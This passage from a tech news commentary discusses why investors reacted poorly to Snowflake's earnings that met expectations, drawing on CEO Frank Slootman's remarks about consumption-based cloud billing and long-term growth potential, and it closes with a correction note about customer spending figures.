Sounds good, right? Apparently being in line with analyst expectations isn’t good enough for investors for certain companies. You see, it didn’t exceed the stated expectations, so the results must be bad. I am not sure how meeting expectations is as good as a miss, but there you are.

It’s worth noting of course that tech stocks have taken a beating so far in 2021. And as my colleague Alex Wilhelm reported this morning, that trend only got worse this week. Consider that the tech-heavy Nasdaq is down 11.4% from its 52-week high, so perhaps investors are flogging everyone and Snowflake is merely caught up in the punishment.

Snowflake CEO Frank Slootman pointed out in the earnings call this week that Snowflake is well positioned, something proven by the fact that his company has removed the data limitations of on-prem infrastructure. The beauty of the cloud is limitless resources, and that forces the company to help customers manage consumption instead of usage, an evolution that works in Snowflake’s favor.

“The big change in paradigm is that historically in on-premise data centers, people have to manage capacity. And now they don’t manage capacity anymore, but they need to manage consumption. And that’s a new thing for — not for everybody but for most people — and people that are in the public cloud. I have gotten used to the notion of consumption obviously because it applies equally to the infrastructure clouds,” Slootman said in the earnings call.

Snowflake has to manage expectations, something that translated into a dozen customers paying $5 million or more on a trailing 12 month basis, according to the company. That’s a nice chunk of change by any measure. It’s also clear that while there is a clear tilt toward the cloud, the amount of data that has been moved there is still a small percentage of overall enterprise workloads, meaning there is lots of growth opportunity for Snowflake.

What’s more, Snowflake executives pointed out that there is a significant ramp up time for customers as they shift data into the Snowflake data lake, but before they push the consumption button. That means that as long as customers continue to move data onto Snowflake’s platform, they will pay more over time, even if it will take time for new clients to get started.

So why is Snowflake’s quarterly percentage growth not expanding? Well, as a company gets to the size of Snowflake, it gets harder to maintain those gaudy percentage growth numbers as the law of large numbers begins to kick in.

I’m not here to tell Wall Street investors how to do their job, anymore than I would expect them to tell me how to do mine. But when you look at the company’s overall financial picture, the amount of untapped cloud potential and the nature of Snowflake’s approach to billing, it’s hard not to be positive about this company’s outlook, regardless of the reaction of investors in the short term.

Note: This article originally stated the company had a dozen customer paying $5 million or more per month. It’s actually on a trailing 12 month basis and we have updated the article to reflect that.